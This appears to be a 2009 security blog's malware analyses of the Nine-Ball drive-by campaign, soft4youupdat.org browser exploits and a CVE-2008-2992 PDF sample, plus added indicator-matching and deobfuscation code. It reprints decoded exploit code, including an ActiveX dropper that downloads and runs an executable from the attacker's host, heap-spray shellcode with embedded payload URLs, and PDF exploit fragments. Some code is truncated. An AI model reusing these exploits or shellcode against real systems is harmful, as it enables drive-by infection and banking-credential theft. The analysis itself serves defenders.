Showing posts with label buffer overflow.

Friday, June 19, 2009

Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:

rnw.kz > bro.tw > rmi.tw > ninetoraq.in

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.

The following is a sample redirect/exploit path followed from the base redirect rnw.kz/index.php:

Exploit Analysis


http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php

All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine).

The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.

The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

// Decoded plugin check: the page only writes the EMBED (and so only serves pdf.php)
// when an "Adobe Acrobat" plugin is present. Comments added for readability;
// the code is otherwise as decoded.
function FVEopW91F0QKb(){
    var Qqz8W8MiQQlAc = false;
    try {
        if (navigator.plugins && navigator.mimeTypes.length){
            for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq++){
                var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
                if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
                    Qqz8W8MiQQlAc = true;
                    break ;
                }
            }
        }
    }
    catch (e){
    }
    if (Qqz8W8MiQQlAc){
        // Only browsers with the Acrobat plugin are handed the PDF
        document.write('<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
    }
    else return false;
}
// Delayed half a second so the plugin enumeration runs after page load
setTimeout("FVEopW91F0QKb();", 500);


The pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the Unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo() JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.

ThreatExpert
VirusTotal

File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.

c:\WINDOWS\system32\mscorewr.dll

File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:

Domain/IP Analysis

The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.

bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw

The table below lists domain registration data for the domains hosted at 91.212.65.133:

Domain    Registration Provider   Registration Date   Registrant Country
mias.tw   WebCC Ltd.              2009-06-15          RU
bmt.tw    WebCC Ltd.              2009-05-17          RU
bro.tw    WebCC Ltd.              2009-06-03          RU
molo.tw   WebCC Ltd.              2009-06-09          RU
orep.tw   WebCC Ltd.              2009-06-15          RU
rmi.tw    WebCC Ltd.              2009-06-12          RU
sovi.tw   WebCC Ltd.              2009-06-12          RU
rnw.kz    SKILLTEX                2009-05-18          RU

Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)
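As an added example (not part of the original post), here is a small JavaScript matcher that normalises defanged indicators (hxxp://, (dot)), reduces the Nine-Ball URLs and hosts listed above to hostnames, and checks the destination of each line in a constructed Squid-style proxy log against them, walking up through parent domains so that mail.bro.tw is caught by the bro.tw entry. The log layout, the sample lines and the function names are assumptions, not anything from Websense or from the analysis above.

```javascript
// Added example, not from the original post: match proxy-log destinations against
// the Nine-Ball indicators listed above. Log format and sample lines are constructed.

// Indicators from the post; two are written defanged (hxxp://, (dot)) in the way
// the later posts on this page write URLs, to exercise the normalisation step.
const NINE_BALL_INDICATORS = [
  '91.212.65.133', 'rnw.kz', 'bro.tw', 'rmi.tw', 'mias.tw',
  'hxxp://my-bilderrahmen(dot)cn/e/t.php',
  'http://adultfex.com/lb/index.php',
  'pendu1um.cn', 'stopssse.info',
];

// Undo common defanging: hxxp:// -> http://, (dot) or [.] -> .
function refang(indicator) {
  return indicator
    .replace(/^hxxp(s?):\/\//i, 'http$1://')
    .replace(/\(dot\)|\[\.\]/gi, '.')
    .toLowerCase();
}

// Reduce a URL or a bare host/IP indicator to the host we match on
function hostOf(indicator) {
  const s = refang(indicator);
  const m = s.match(/^https?:\/\/([^\/:?#]+)/);
  return m ? m[1] : s;
}

function buildHostSet(indicators) {
  return new Set(indicators.map(hostOf));
}

// Squid native access.log layout (assumed): ts duration client code/status bytes method url ...
function parseProxyLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  return { ts: f[0], client: f[2], method: f[5], url: f[6], host: hostOf(f[6]) };
}

// Walk from the full host up through its parent domains (never the bare TLD)
// and return one hit per matching line.
function findHits(lines, hostSet) {
  const hits = [];
  for (const line of lines) {
    const rec = parseProxyLine(line);
    if (!rec) continue;
    const labels = rec.host.split('.');
    for (let i = 0; i < labels.length - 1; i++) {
      const candidate = labels.slice(i).join('.');
      if (hostSet.has(candidate)) {
        hits.push({ ...rec, indicator: candidate });
        break;
      }
    }
  }
  return hits;
}

// Constructed sample log lines (203.0.113.10 is a documentation address)
const SAMPLE_LOG = [
  '1245400000.123 210 10.0.0.5 TCP_MISS/302 512 GET http://rnw.kz/index.php - DIRECT/91.212.65.133 text/html',
  '1245400001.456 340 10.0.0.5 TCP_MISS/200 2048 GET http://www.example.com/ - DIRECT/203.0.113.10 text/html',
  '1245400002.789 120 10.0.0.7 TCP_MISS/200 15139 GET http://mail.bro.tw/in.cgi?3 - DIRECT/91.212.65.133 text/html',
  '1245400003.001 90 10.0.0.9 TCP_MISS/200 300 GET http://91.212.65.133/1/getexe.php - DIRECT/91.212.65.133 application/octet-stream',
];

// One human-readable line per hit
function report(lines, indicators) {
  return findHits(lines, buildHostSet(indicators))
    .map(h => `${h.ts} ${h.client} -> ${h.host} matched indicator ${h.indicator}`);
}

console.log(report(SAMPLE_LOG, NINE_BALL_INDICATORS).join('\n'));
```

Matching on the parent domain is what makes the registrar-level indicators (bro.tw, rmi.tw) useful against the mail.* and ns1.* hostnames in the resolution list above; the IP indicator still requires an exact match.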

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the fireworks begin...

Friday, December 19, 2008

soft4youupdat.org Exploit Analysis

The analysis of exploit code hosted at soft4youupdat.org results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for http://soft4youupdat.org/counts/index.php returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

(1)
<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

(2)
<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

(3)
<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

(4)
<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is

stringObject.replace(findstring,newstring)

A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.

Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ''. The decoded section returns a string of escaped hexadecimal characters.

eval('\x61\x7a\x20\x3d\x20\x6e\x65\x77\x20\x41\x72\x72\x61\x79\x28\x29\x3b\x61\x7a\x2e\x70\x75\x73\x68\x28\x27\x68\x5e\x74\x26\x74\x70\x29…….truncated…….\x7b\x7d\x7d')

The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();
az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
for(i = 0; i <= az.length - 1; i++){
 start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
}
function start(sUrl, sPath) {
 var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
 z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
 z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
 try {
  var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
  try {
   t.type = 1;
   q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);
   q.send();
   t.open();
   t.write(q.responseBody);
   t.savetofile(sPath,2);
   t.close();
  } catch(e) {}
  try {
   s.shellexecute(sPath);
   if(shellexecute=true) {
    var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
    b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random());
    b.send(null);
   }
  } catch(e){}
 } catch(e){}
}
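As an added example (not from the original post), the following JavaScript decodes both obfuscation layers statically, so the script text can be read without ever passing it to eval(): it detects and strips the interleaved junk token (Tgwm in block 1), converts the remaining \xNN escapes, and removes the ! @ # $ % ^ & * ( ) salt from every literal that the decoded code cleans at runtime with the replace() call shown above. The sample inputs are constructed from the first bytes of block 1 and from literals in the decoded code; the function names are assumptions.

```javascript
// Added example, not from the original post: a static decoder for the two
// replace()-based obfuscation layers used by the soft4youupdat.org scripts.
// It works on the script text an analyst has in hand and never eval()s it.

// Layer 1: a junk token (e.g. "Tgwm") is interleaved with \xNN escapes and
// removed at runtime by .replace(/Tgwm/g, '') before eval().
function guessJunkToken(encoded) {
  // the token is whatever run of word characters precedes the first \x escape
  const m = encoded.match(/^([A-Za-z0-9_]+)\\x/);
  return m ? m[1] : null;
}

function stripJunkToken(encoded, token) {
  const escaped = token.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); // make the token regex-safe
  return encoded.replace(new RegExp(escaped, 'g'), '');
}

// Turn the remaining \xNN escapes into characters without evaluating anything
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

function decodeLayer1(encoded) {
  const token = guessJunkToken(encoded);
  if (token === null) throw new Error('no junk token found before the first \\x escape');
  return decodeHexEscapes(stripJunkToken(encoded, token));
}

// Layer 2: string literals are salted with ! @ # $ % ^ & * ( ) and cleaned at
// runtime with .replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''). Applying the same
// regex statically recovers the literal.
const NOISE = /\!|@|#|\$|%|\^|&|\*|\(|\)/ig;
function stripNoise(literal) {
  return literal.replace(NOISE, '');
}

// Rewrite every "'<salted>'.replace(/.../ig, '')" call in a script fragment to
// the clean literal, so the fragment can be read as ordinary code.
function decodeLayer2(script) {
  return script.replace(/'([^']*)'\.replace\(\/[^/]*\/ig, ''\)/g,
    (_, lit) => `'${stripNoise(lit)}'`);
}

// Constructed sample: the start of block (1), i.e. "az = new Array();" behind the Tgwm token
const SAMPLE_LAYER1 = 'Tgwm\\x61Tgwm\\x7aTgwm\\x20Tgwm\\x3dTgwm\\x20Tgwm\\x6eTgwm\\x65Tgwm\\x77'
  + 'Tgwm\\x20Tgwm\\x41Tgwm\\x72Tgwm\\x72Tgwm\\x61Tgwm\\x79Tgwm\\x28Tgwm\\x29Tgwm\\x3b';

// Constructed sample of a layer-2 fragment built from a literal that appears in the decoded code
const SAMPLE_LAYER2 = "var z = document.createElement('o&b!j))e*ct!'.replace(/\\!|@|#|\\$|%|\\^|&|\\*|\\(|\\)/ig, ''));";

console.log(decodeLayer1(SAMPLE_LAYER1));
console.log(decodeLayer2(SAMPLE_LAYER2));
```

Decoding this way keeps the analyst on the safe side of the eval() boundary: layer 1 yields the next script to feed to decodeLayer2, and nothing from the sample is ever executed.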

Exploit Block 2

The second block of exploit code uses the same obfuscation technique and decodes to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; }
window.onerror = killErrors;
var x;
var obj;
var myarr = new Array();
myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';
myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';
myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';
setTimeout('window.location = "ldap://127.0.0.1"', 5000);
for (x in myarr){
 obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));
 try{
  var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();
  var buf2 = myarr[x];
  obj.Zoom = 0;
  obj.SnapshotPath = buf1;
  obj.CompressedPath = buf2;
  obj.PrintSnapshot();
 }catch(e){}
}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12, which provides desktop publishing for Linux/Unix. Scribus provides a step-by-step guide for beginning to enhance PDFs with JavaScript. The creation date is 8-6-08.

13 0 obj
<>
stream

[filter FlateDecode has been applied to the JavaScript bitstream]

endstream
endobj
12 0 obj
<>
endobj
14 0 obj
<<
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj

The tool pdftk (the PDF Toolkit) can be used to inflate the FlateDecode JavaScript stream. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
{
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
{
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique and decodes to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");
function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){
while (sssprassydddbSliiide.length * 2 < …….truncated…….

[Lost when the page was captured; surviving fragments, in order: sssprassydddbSliiide = sssprassydddbSliiide.substring(0, …); hpsdyytttscess = 0x0c0c0c0c; var hadttdtSize = 0x400000; var payfdLytyusade = Shellcode.length …; tggter = payfdLytyusade …; saruuysaddize = hadttdtSize …; sssprassydddbSliiide = unescape(…); prrerat = new …; sssprassydddbSliiide = geSpyrrSlirrdep(sssprassydddbSliiide, …); kilrrer = hpsdyytttscess …; hsttiicks = kilrrer …; i = 0; ugric = unescape(…); xyz = 0x40000; while(ugric.length …; ugric = ugric.substring(0, …); bublic = new …; i = bublic; …]

');
zorro = Math.ceil(0xd0d0d0d);
zorro = document.scripts[0].createControlRange().length;
}catch(e) {}
setTimeout("startAudioFile()", 2000);
}
function startAudioFile(){
try{
var mmed = document.createElement("object");
mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");
var mms="";
for(var i=0; i < …….truncated…….

[Lost when the page was captured; surviving fragments: body = ''; var buf1 = ''; for (i = 1; i <= 1945; i++){ buf1 = buf1 + unescape(" …); href="http://google.com/" …]

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

%System%\ntos.exe
0xB01F2D6531F9EC917E8996ED5962DB48
308,736 bytes

%System%\wsnpoem\audio.dll
%System%\wsnpoem\video.dll

The following registry key is created to launch the malware at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit" = "%System%\userinit.exe,%System%\ntos.exe,"

VirusTotal indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)].

Domain Analysis
The domain soft4youupdat.org was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR
Domain Name:SOFT4YOUUPDAT.ORG

Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:andrea12a@inbox.ru

The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {0.0.0.0/0}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
notify: noc@softlayer.com
mnt-by: MAINT-AS36351
changed: ipadmin@softlayer.com 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp, an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1)
67.228.139.0 - 67.228.139.127

SOFTLAYER Technologies Inc is listed by StopBadware.org in their top 10 worst network block owners, and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both Innovation IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian cyberwar on Georgia.


Wednesday, November 12, 2008

CVE-2008-2992 Adobe PDF Exploitation

On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by Core Security Technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site infonews.ath.cx hosted the malicious PDF file data.pdf (hxxp://infonews.ath.cx/data.pdf). The domain ath.cx is controlled by five name servers at dyndns.org. Dynamic DNS (DDNS) allows individuals to create a hostname that points to their dynamic or static IP address or URL. DynDNS also provides an update mechanism which keeps the hostname working as a dynamic IP address changes.

ns1.dyndns.org 63.208.196.90
ns2.dyndns.org 204.13.249.75
ns3.dyndns.org 208.78.69.75
ns4.dyndns.org 91.198.22.75
ns5.dyndns.org 203.62.195.75

At the time of exploit, infonews.ath.cx resolved to 85.17.162.100 located in the Netherlands.

inetnum: 85.17.162.0 - 85.17.162.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to abuse@leaseweb.com for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP 85.17.162.100 currently maps to 19 domains.

*.adrefer.net
*.adxdnet.net
*.kasdfps.net
ad.adrefer.net
adrefer.net
adxcnet.net
adxdnet.net
awltovhc.net
espads.net
especialads.com
ikwlkad.net
infonews.ath.cx
iwdjiamk.net
kasdfps.net
kiafjwo.net
netcrefer.net
ssa.adxdnet.net
tqlkg.net
www.kasdfps.net

File: data.pdf
MD5: 84bc91579cd4dbee7faf3ee09c4a9a4b
Size: 10179

The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj



The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937
%u4949%u4949%u4949%u4949%u4949%u5a51%u656a%u5058%u4230%u4231%u6b41%u4141%u4175%u4132%u3241
%u4142%u4230%u5841%u4138%u5042%u4d75%u7939%u4d6c%u5038%u4344%u4530%u3550%u4c50%u714b%u5555
